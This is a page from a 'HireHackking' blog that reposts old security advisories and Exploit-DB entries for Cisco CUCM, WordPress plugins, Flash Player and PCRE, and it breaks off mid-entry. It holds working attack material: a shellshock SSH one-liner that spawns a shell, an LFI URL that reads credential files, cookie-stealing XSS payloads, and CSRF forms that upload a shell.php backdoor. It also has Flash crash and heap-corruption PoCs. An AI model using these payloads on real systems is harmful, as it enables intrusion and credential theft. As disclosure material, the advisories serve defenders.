Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153207

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Vantage Point Security Advisory 2015-001
========================================

Title: Cisco Unified Communications Manager Multiple Vulnerabilities
Vendor: Cisco
Vendor URL: http://www.cisco.com/
Versions affected:  <9.2, <10.5.2, <11.0.1.
Severity: Low to medium
Vendor notified: Yes
Reported: Oct. 2014
Public release: Aug. 13th, 2015
Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>

Summary:
--------

Cisco Unified Communications Manager (CUCM) offers services such as session
management, voice, video, messaging, mobility, and web conferencing.

During the last year, Vantage Point Security has reported four security
issues to Cisco as listed below.


1. Shellshock command injection
--------------------------------

Authenticated users of CUCM can access limited functionality via the web
interface and Cisco console (SSH on port 22). Because the SSH server is
configured to process several environment variables from the client and a
vulnerable version of bash is used, it is possible to exploit command
injection via specially crafted environment variables (CVE-2014-6271 a.k.a.
shellshock). This allows an attacker to spawn a shell running as the user
"admin".


Several environment variables can be used to exploit the issue. Example:


$ LC_PAPER="() { x;};/bin/sh" ssh Administrator@examplecucm.com


2. Local File Inclusion
-----------------------

The application allows users to view the contents of any locally accessible
files on the web server through a vulnerability known as LFI (Local File
Inclusion). LFI vulnerabilities are commonly used to download application
source code, configuration files and files containing sensitive information
such as passwords. Exploiting this issue requires a valid user account.


https://cucm.example.com/:8443/reporter-servlet/GetFileContent?Location=/&FileName=/usr/local/thirdparty/jakarta-tomcat/conf/tomcat-users.xml


3. Unauthenticated access to ping command
-----------------------------------------

The pingExecute servlet allows unauthenticated users to execute pings to
arbitrary IP addresses. This could be used by an attacker to enumerate the
internal network. The following URL triggers a ping of the host 10.0.0.1:

https://cucm.example.com:8443/cmplatform/pingExecute?hostname=10.0.0.1&interval=1.0&packetsize=12&count=1000&secure=false


4. Magic session ID allows unauthenticated access to SOAP calls
---------------------------------------------------------------

Authentication for some methods in the EPAS SOAP interface can be bypassed
by using a hardcoded session ID. The methods "GetUserLoginInfoHandler" and
"GetLoggedinXMPPUserHandler" are affected.


Fix Information:
----------------

Upgrade to CUCM version 9.2, 10.5.2 or 11.0.1.


References:
-----------

https://tools.cisco.com/quickview/bug/CSCus88031
https://tools.cisco.com/quickview/bug/CSCur49414
https://tools.cisco.com/quickview/bug/CSCum05290
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
http://tools.cisco.com/security/center/viewAlert.x?alertId=37111


Timeline:
---------

2014/10: Issues reported to Cisco;
2015/07: Confirm that all issues have been fixed.


About Vantage Point Security:
--------------------

Vantage Point is the leading provider for penetration testing and security
advisory services in Singapore. Clients in the Financial, Banking and
Telecommunications industries select Vantage Point Security based on
technical competency and a proven track record to deliver significant and
measurable improvements in their security posture.

https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
HireHackking 
source: https://www.securityfocus.com/bid/55664/info

The Token Manager plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Token Manager 1.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=tokenmanageredit&tid=<script>alert(document.cookie);</script>
http://www.example.com/wp-admin/admin.php?page=tokenmanagertypeedit&tid=<script>alert(document.cookie);</script>
HireHackking 
source: https://www.securityfocus.com/bid/55660/info

WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.

WordPress 3.4.2 is vulnerable; other versions may also be affected. 

<body onload="javascript:document.forms[0].submit()"> <form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form"> <h1>How Many Girls You Have? xD))</h1> <!-- Idea for you: Iframe it --> <input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" /> <select id="rss-items-1" name="widget-rss[1][items]"> <option value='1' >1</option> <option value='2' >2</option> <option value='3' >3</option><option value='4' >4</option> <option value='5' >5</option> <option value='6' >6</option> <option value='7' >7</option> <option value='8' >8</option> <option value='9' >9</option> <option value='10' >10</option> <option value='11' >11</option> <option value='12' >12</option> <option value='13' >13</option> <option value='14' >14</option> <option value='15' >15</option> <option value='16' >16</option> <option value='17' >17</option> <option value='18' >18</option> <option value='19' >19</option> <option value='20' selected='selected'>20</option> </select> <input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/> <input type="hidden" name="widget_id" value="dashboard_incoming_links" /> </form>
HireHackking 
source: https://www.securityfocus.com/bid/55666/info

The Sexy Add Template plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.

Sexy Add Template 1.0 is vulnerable; other versions may also be affected. 

#################################################################################
 #
 # [ Information Details ]
 # - Wordpress Plugin Sexy Add Template:
 # Attacker allow CSRF Upload Shell.
 # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
 #
 # <html>
 # <head>
 # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
 # </head>
 # <body onload="document.form0.submit();">
 # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
 # <input type="hidden" name="newfile" value="yes" /> 
 # <input type="hidden" type="text" value="shell.php" name="AM_filename">
 # <textarea type="hidden" name="AM_file_content">
 # [ Your Script Backdoor/Shell ]
 # &lt;/textarea&gt;
 # </form>
 # </body>
 # </html>
 #
 # - Access Shell:
 # http://www.example.com/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!!
 #
 # +#################################################################################
HireHackking

Neturf eCommerce Shopping Cart - 'searchFor' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55667/info Neturf eCommerce Shopping Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
HireHackking
Source: https://code.google.com/p/google-security-research/issues/detail?id=278&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id FlashBroker - Junction Check Bypass With Forward Slash IE PM Sandbox Escape 1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions. There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker only considers "\" as delimiter. If the destination includes "/", FlashBroker will use a wrong destination folder for check. The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction. 2. Credit Jietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37840.zip
HireHackking
Source: https://code.google.com/p/google-security-research/issues/detail?id=280&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id FlashBroker - BrokerMoveFileEx TOCTOU IE PM Sandbox Escape 1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions. There is a race condition in FlashBroker BrokerMoveFileEx method. This race can be won by using an oplock to wait for the point where the BrokerMoveFileEx method opens the original file and then making destination to be a junction. The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction. 2. Credit Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37842.zip
HireHackking
Source: https://code.google.com/p/google-security-research/issues/detail?id=303&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Tracking for: https://code.google.com/p/chromium/issues/detail?id=470864] VULNERABILITY DETAILS Use After Free in Flash AVSS.setSubscribedTags, setCuePointTags and setSubscribedTagsForBackgroundManifest can be abused to write pointers to String to freed locations. VERSION Chrome Version: 41.0.2272.101 stable, Flash 17.0.0.134 Operating System: Win7 x64 SP1 REPRODUCTION CASE Use After Free vulnerability in AVSS.setSubscribedTags can cause arbitrary code execution. pepflashplayer.dll 17.0.0.134, based at 0x10000000. The setSubscribedTags is handled by sub_103255AD: .text:103255AD push ebp .text:103255AE mov ebp, esp .text:103255B0 and esp, 0FFFFFFF8h .text:103255B3 sub esp, 14h .text:103255B6 push ebx .text:103255B7 mov ebx, [ebp+arg_0] .text:103255BA push esi .text:103255BB push edi .text:103255BC mov edi, eax .text:103255BE mov eax, [ebx] .text:103255C0 mov ecx, ebx .text:103255C2 call dword ptr [eax+8Ch] ; first get the length of the provided array .text:103255C8 lea esi, [edi+4Ch] .text:103255CB mov [esp+20h+var_C], eax .text:103255CF call sub_103265BB .text:103255D4 mov esi, [esp+20h+var_C] .text:103255D8 test esi, esi .text:103255DA jz loc_1032566D .text:103255E0 xor ecx, ecx .text:103255E2 push 4 .text:103255E4 pop edx .text:103255E5 mov eax, esi .text:103255E7 mul edx .text:103255E9 seto cl .text:103255EC mov [edi+58h], esi .text:103255EF neg ecx .text:103255F1 or ecx, eax .text:103255F3 push ecx .text:103255F4 call unknown_libname_129 ; and then allocate an array of 4*length .text:103255F9 and [esp+24h+var_10], 0 .text:103255FE pop ecx .text:103255FF mov [edi+54h], eax ; that pointer is put at offset 0x54 in the object pointed by edi Next there is a for loop that iterates over the array items and calls the toString() method of each item encountered: .text:10325606 loc_10325606: .text:10325606 mov eax, [edi+8] .text:10325609 mov eax, [eax+14h] .text:1032560C mov esi, [eax+4] .text:1032560F push [esp+20h+var_10] .text:10325613 mov eax, [ebx] .text:10325615 mov ecx, ebx .text:10325617 call dword ptr [eax+3Ch] ; get the ith element .text:1032561A push eax .text:1032561B mov ecx, esi .text:1032561D call sub_1007205D ; call element->toString() .text:10325622 lea ecx, [esp+20h+var_8] .text:10325626 push ecx .text:10325627 call sub_10061703 .text:1032562C mov eax, [esp+20h+var_4] .text:10325630 inc eax .text:10325631 push eax .text:10325632 call unknown_libname_129 .text:10325637 mov edx, [edi+54h] .text:1032563A pop ecx .text:1032563B mov ecx, [esp+20h+var_10] .text:1032563F mov [edx+ecx*4], eax ; write a pointer to the string in the array ... .text:1032565F inc [esp+20h+var_10] .text:10325663 mov eax, [esp+20h+var_10] .text:10325667 cmp eax, [esp+20h+var_C] .text:1032566B jl short loc_10325606 The issue can be triggered as follows. Register an object with a custom toString method in an array and call AVSS.setSubscribedTags(array). When object.toString() is called, call again AVSS.setSubscribedTags with a smaller array. This results in freeing the first buffer. So when the execution flow returns to AVSS.setSubscribedTags a UAF occurs allowing an attacker to write a pointer to a string somewhere in memory. Trigger with that: var avss:flash.media.AVSegmentedSource = new flash.media.AVSegmentedSource (); var o:Object = new Object(); o.toString = function():String { var a = [0,1,2,3]; avss.setSubscribedTags(a); return "ahahahahah" }; var a = [o,1,2,3,4,5,6,7,8,9]; var i:uint = 0; while (i < 0x100000) { i++; a.push(i); } avss.setSubscribedTags(a); Note: AVSS.setCuePointTags and AVSS.setSubscribedTagsForBackgroundManifest are vulnerable as well, see XAVSSArrayPoc2.swf and XAVSSArrayPoc3.swf. Compile with mxmlc -target-player 15.0 -swf-version 25 XAVSSArrayPoc.as. My mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 bytes, then free that buffer, then reallocate 4*4 bytes, then write 0x100000 pointers to a buffer of size 0x10. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37844.zip
HireHackking
Source: https://code.google.com/p/google-security-research/issues/detail?id=316&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Tracking for: https://code.google.com/p/chromium/issues/detail?id=472201] Credit is to bilou, working with the Chromium Vulnerability Rewards Program. --- VULNERABILITY DETAILS Loading a weird MPD file can corrupt flash player's memory. VERSION Chrome version 41.0.2272.101, Flash 17.0.0.134 Operating System: Win 7 x64 SP1 REPRODUCTION CASE I'm ripping most of this from scarybeasts' sources. I'm sure he's ok with that =D. "To reproduce, host the attached SWF and other files on a web server (e.g. localhost) and load it like this:" "http://localhost/PlayManifest.swf?file=gen.mpd "To compile the .as file, I had to use special flags to flex:" "mxmlc -target-player 14.0 -swf-version 25 -static-link-runtime-shared-libraries ./PlayManifest.as" "(This also requires that you have v14.0 of playerglobals.swc installed. Any newer version should also be fine.)" On Win7 x64 sp1 with Chrome 32 bit, crash like this: 6AA8B67C | 8B C3 | mov eax,ebx | 6AA8B67E | E8 A1 05 00 00 | call pepflashplayer.6AA8BC24 | 6AA8B683 | EB A8 | jmp pepflashplayer.6AA8B62D | 6AA8B685 | 89 88 D0 00 00 00 | mov dword ptr ds:[eax+D0],ecx | // crash here, eax points somewhere in pepflashplayer.dll 6AA8B68B | 8B 88 88 00 00 00 | mov ecx,dword ptr ds:[eax+88] | 6AA8B691 | 33 D2 | xor edx,edx | 6AA8B693 | 3B CA | cmp ecx,edx | 6AA8B695 | 74 07 | je pepflashplayer.6AA8B69E | 6AA8B697 | 39 11 | cmp dword ptr ds:[ecx],edx | 6AA8B699 | 0F 95 C1 | setne cl | At first sight this looks to be an uninitialized stack variable but I might be wrong. --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37845.zip
HireHackking

Adobe Flash AS2 - textfield.filters Use-After-Free (2)

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=342&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Tracking for https://code.google.com/p/chromium/issues/detail?id=480496] Credit is to bilou, working with the Chromium Vulnerability Rewards Program. --- VULNERABILITY DETAILS A little bug while setting the TextFilter.filters array. Chrome 42.0.2311.90 with Flash 17.0.0.169 VERSION Chrome Version: 42.0.2311.90 Stable with Flash 17.0.0.169 Operating System: [Win 7 SP1] REPRODUCTION CASE We can set the TextFilter.filters array with either an array or a custom object. Providing an object allows an attacker to execute AS2 code in the following loop (these lines come from flashplayer17_sa.exe 17.0.0.169): .text:004D6964 loc_4D6964: .text:004D6964 and eax, 0FFFFFFF8h .text:004D6967 push edi .text:004D6968 mov edi, eax .text:004D696A mov ecx, edi .text:004D696C xor esi, esi .text:004D696E call xAS2_getArrayLength ; here we can override object.length and execute some code .text:004D6973 test eax, eax ; if that code frees the object pointed by ebx... .text:004D6975 jle short loc_4D69A3 .text:004D6977 .text:004D6977 loc_4D6977: .text:004D6977 push edi .text:004D6978 mov ecx, esi .text:004D697A call sub_4D3FE0 ; get an item from the object .text:004D697F add esp, 4 .text:004D6982 test eax, eax ; we have either a filter or 0 here .text:004D6984 jz short loc_4D6997 .text:004D6986 mov edx, [eax] .text:004D6988 mov ecx, eax .text:004D698A mov eax, [edx+18h] .text:004D698D call eax .text:004D698F push eax .text:004D6990 mov ecx, ebx ; ...we get a use after free here .text:004D6992 call sub_4CDB70 ; and a write-4 condition here .text:004D6997 .text:004D6997 loc_4D6997: .text:004D6997 mov ecx, edi .text:004D6999 inc esi .text:004D699A call xAS2_getArrayLength .text:004D699F cmp esi, eax .text:004D69A1 jl short loc_4D6977 Freeing the object pointed by ebx is easy indeed: var tfield:TextField = createTextField("tf",1,1,2,3,4) //create a TextField at depth 1 tfield.filters = [] //create the targeted object createTextField("textf",1,1,2,3,4) //create again a TextField (or any other DisplayObject) at the same depth and Flash frees the targeted object flash_as2_filters_uaf_write4_poc.swf just crashes the program and flash_as2_filters_uaf_write4.swf crashes while writing to 0x41424344 *************************************************************************** Content of flash_as2_filters_uaf_write4_poc.fla //Compile that with Flash CS5.5 and change the property "s" in the swf to "3" //It's because Flash CS5.5 does not allow naming a property with a numeral import flash.filters.GlowFilter; var tfield:TextField = createTextField("tf",1,1,2,3,4) function f() { _global.mc.createTextField("tf",1,1,2,3,4) } _global.mc = this _global.counter = 0 var oCounter:Object = new Object() oCounter.valueOf = function () { _global.counter += 1 if (_global.counter == 1) f() return 10; } var o = {length:oCounter, 3:new GlowFilter(1,2,3,4,5,6,true,true)} tfield.filters = o *************************************************************************** Content of flash_as2_filters_uaf_write4.fla //Compile that with Flash CS5.5 and change the property "s" in the swf to "3" //It's because Flash CS5.5 does not allow naming a property with a numeral import flash.filters.GlowFilter; var a1:Array = new Array() var a2:Array = new Array() for (i = 0; i<0x3F8/4;i++) { a2[i] = 0x41424344 } a2[3] = 0 a2[0x324/4] = 0x41414100 a2[0x324/4 + 1] = 0x41424344 a2[0x324/4 + 2] = 0x41414143 a2[0x324/4 + 3] = 0x41414100 for (var i = 0; i<0x200;i++) { var tf:TextFormat = new TextFormat() a1[i] = tf } for (var i = 0; i<0x100;i++) { a1[i].tabStops = a2 } var tfield:TextField = createTextField("tf",1,1,2,3,4) function f() { _global.mc.createTextField("tf",1,1,2,3,4) for (var i = 0x100; i<0x200;i++) { _global.a1[i].tabStops = _global.a2 } } _global.mc = this _global.counter = 0 _global.a1 = a1 _global.a2 = a2 var oCounter:Object = new Object() oCounter.valueOf = function () { _global.counter += 1 if (_global.counter == 1) f() return 10; } var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)} tfield.filters = o --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37848.zip
HireHackking

Adobe Flash - Display List Handling Use-After-Free

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=349&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id Credit is to KEEN Team. 3 different PoC's in the attached zip. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37849.zip
HireHackking

Adobe Flash - 'Setting' Use-After-Free

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=355&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id In certain cases where a native AS2 class sets an internal variable, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.contentType, this applies to several other variables including many proprties of the Sound and NetStream classes. A proof of concept is as follows: var s = SharedObject.getLocal("test"); ASSetPropFlags(s, null, 0, 0xff); ASSetPropFlags(s.data, null, 0, 0xff); var o = {myprop: "test", myprop2: "test"}; s.data.contentType = o; flush(); ASnative(2100, 200)(s.data); // new NetConnection trace(s.data.contentType); s = 1; //Do GC for(var i = 0; i < 100; i++){ var b = new flash.display.BitmapData(100, 1000, true, 1000); } setInterval(c, 1000); function c(){ ASnative(252, 1).call(o); //Array push } A fla, an AS file and two swfs are attached. donotdelete.fla compiles to donotdelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and donotdelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37852.zip
HireHackking

Adobe Flash - '.SWF' Out-of-Bounds Memory Read (1)

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=361&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id The following access violation was observed in the Adobe Flash Player plugin: (150c.ca0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for FlashPlayer.exe - eax=078a53b7 ebx=00f28938 ecx=002dea24 edx=000085ed esi=000085ee edi=09d9eee0 eip=0139a657 esp=002de9b4 ebp=002deda4 iopl=0 nv up ei ng nz ac pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297 FlashPlayer!WinMainSandboxed+0x572f0: 0139a657 8a0402 mov al,byte ptr [edx+eax] ds:002b:078ad9a4=?? 0:000> !address eax [...] Usage: <unknown> Base Address: 07560000 End Address: 078ad000 Region Size: 0034d000 State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE Allocation Base: 07560000 Allocation Protect: 00000001 PAGE_NOACCESS 0:000> db eax 078a53b7 c5 ea 85 00 00 b6 19 00-38 01 c5 3d 84 9e c2 3d ........8..=...= 078a53c7 2f 48 d5 a0 2b 00 73 65-63 6f 6e 64 00 00 00 03 /H..+.second.... 078a53d7 00 00 00 01 00 00 00 01-00 00 00 00 02 00 00 00 ................ 078a53e7 b7 01 00 00 88 39 00 0a-00 74 68 69 73 00 5f 78 .....9...this._x 078a53f7 00 78 6d 00 5f 79 00 79-6d 00 5f 72 6f 6f 74 00 .xm._y.ym._root. 078a5407 66 69 72 73 74 73 00 63-6c 61 75 73 00 68 70 00 firsts.claus.hp. 078a5417 72 65 6d 6f 76 65 4d 6f-76 69 65 43 6c 69 70 00 removeMovieClip. 078a5427 96 02 00 08 00 1c 96 04-00 08 01 08 00 1c 96 02 ................ Notes: - Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows. - The out-of-bounds read appears to be caused by an overly large index value (stored in the "EDX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "EAX". - The memory under "EAX" contains a section of the input file starting at offset 0x3453b7. - The index (EDX) value originates from offset 0x3453b8 in the file (at 1 byte offset relative to the EAX memory region). - Attached samples: signal_sigsegv_7ffff6d2184d_5692_9217909125eb9174614e1368d5f07173 (crashing file), 9217909125eb9174614e1368d5f07173 (original file). The total difference between the two files is 13 bytes. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37856.zip
HireHackking

Adobe Flash AS2 - MovieClip.scrollRect Use-After-Free

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521] --- VULNERABILITY DETAILS When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains in the stack VERSION Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169 Operating System: [Win 7 SP1] REPRODUCTION CASE That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash. These lines come from flashplayer standalone 17.0.0.169: .text:00597F45 loc_597F45: .text:00597F45 cmp eax, 6 .text:00597F48 jnz loc_597FE5 .text:00597F4E mov ecx, esi ; esi points to the MovieClip object .text:00597F50 call sub_40C1ED .text:00597F55 add eax, 30Ch .text:00597F5A or dword ptr [eax], 8 .text:00597F5D mov eax, [ebx] .text:00597F5F mov byte ptr [eax+82Ch], 1 .text:00597F66 mov ecx, [ebx] .text:00597F68 lea eax, [ebp+74h+var_1C0] .text:00597F6E push eax .text:00597F6F push dword ptr [ebx+0Ch] .text:00597F72 call xfetchRectangleProperties ; get the Rectangle properties, and execute some AS2 .text:00597F77 test al, al .text:00597F79 jz loc_598274 .text:00597F7F mov edi, [ebp+74h+var_1C0] .text:00597F85 mov ecx, esi .text:00597F87 imul edi, 14h .text:00597F8A call sub_40C1ED ; reference freed memory and return a bad pointer .text:00597F8F mov [eax+310h], edi ; crash here, eax = 0 Poc (compile with Flash CS5.5): import flash.geom.Rectangle var o2 = {} o2.valueOf = function () { _global.mc.createTextField("newtf",1,1,1,2,3) return 7 } var o = {x:o2,y:0,width:4,height:5} _global.mc = this var newmc:MovieClip = this.createEmptyMovieClip("newmc",1) newmc.scrollRect = o --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37854.zip
HireHackking
Source: https://code.google.com/p/google-security-research/issues/detail?id=363&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id The following access violation was observed in the Adobe Flash Player plugin: (1ba8.1c60): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for FlashPlayer.exe - eax=0004c800 ebx=00000000 ecx=08982000 edx=00002588 esi=00001200 edi=0042d46c eip=017723c0 esp=0042d278 ebp=0042d3c4 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x254f0: 017723c0 8b0408 mov eax,dword ptr [eax+ecx] ds:002b:089ce800=???????? 0:000> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0042d3c4 0177cfaf 0042d3e0 0042d46c 00000001 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x254f0 0042d3ec 0177d112 0042d414 0042d46c 00001376 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x300df 0042d424 0177d4c2 0042d454 0042d46c 00000006 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x30242 0042d4e0 0176ec7a 00000000 0042d540 03497440 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x305f2 0042d544 01788715 08875020 47535542 6c61746e FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x21daa 0042d7d8 01775c95 0042d814 01775f31 01775f41 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x3b845 0042d7e0 01775f31 01775f41 03497440 00000000 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x28dc5 0042d828 017834d2 03497440 00000000 00000030 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x29061 00000000 00000000 00000000 00000000 00000000 FlashPlayer!IAEModule_IAEKernel_UnloadModule+0x36602 0:000> db ecx 08982000 35 00 00 00 01 00 00 00-00 00 00 00 00 00 00 ff 5............... 08982010 00 00 00 00 00 00 00 00-01 00 00 00 00 00 00 00 ................ 08982020 80 a4 b7 01 00 00 00 00-00 00 00 00 00 10 00 00 ................ 08982030 00 00 00 00 18 a8 b7 01-20 50 87 08 00 00 00 00 ........ P...... 08982040 03 30 02 00 49 00 00 00-01 00 00 00 00 00 00 00 .0..I........... 08982050 00 00 00 ff 00 00 00 00-00 00 00 00 01 00 00 00 ................ 08982060 00 00 00 00 80 a4 b7 01-00 00 00 00 00 00 00 00 ................ 08982070 00 10 00 00 00 00 00 00-18 a8 b7 01 20 50 87 08 ............ P.. 0:000> !address ecx [...] Usage: <unknown> Base Address: 08906000 End Address: 08990000 Region Size: 0008a000 State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE Allocation Base: 087f0000 Allocation Protect: 00000001 PAGE_NOACCESS Notes: - Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows. - The out-of-bounds read appears to be caused by an overly large index value (stored in the "EAX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "ECX". - The 32-bit value read from the unmapped memory address is in fact a pointer, and is used to immediately read 12 bytes from in one function up the call chain. - Attached samples: signal_sigsegv_7ffff710e9d3_881_11431348555663755408.ttf.swf (crashing file), 11431348555663755408.ttf.swf (original file). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37858.zip
HireHackking
Source: https://code.google.com/p/google-security-research/issues/detail?id=224&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id There’s an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE. This issue is a duplicate of http://bugs.exim.org/show_bug.cgi?id=1546 originally reported to PCRE upstream by mikispag; I rediscovered the issue fuzzing Flash so have filed this bug report to track disclosure deadline for Adobe. The issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator. Simplest testcase that will crash in an ASAN build is the following: (?(?<a>)?) This is pretty much a nonsense expression, and I'm not sure why it compiles successfully; but it corresponds to the statement that 'assert that named group 'a' optionally matches'; which is tautologically true regardless of 'a'. Regardless, we emit the following bytecode: 0000 5d0012 93 BRA [18] 0003 5f000c 95 COND [12] 0006 66 102 BRAZERO 0007 5e00050001 94 CBRA [5, 1] 000c 540005 84 KET [5] 000f 54000c 84 KET [12] 0012 540012 84 KET [18] 0015 00 0 END When this is executed, we reach the following code: /* The condition is an assertion. Call match() to evaluate it - setting the final argument match_condassert causes it to stop at the end of an assertion. */ else { RMATCH(eptr, ecode + 1 + LINK_SIZE, offset_top, md, ims, NULL, match_condassert, RM3); if (rrc == MATCH_MATCH) { condition = TRUE; ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2); while (*ecode == OP_ALT) ecode += GET(ecode, 1); <---- ecode is out of bounds at this point. If we look at the execution trace for this expression, we can see where this code goes wrong: exec 0x600e0000dfe4 93 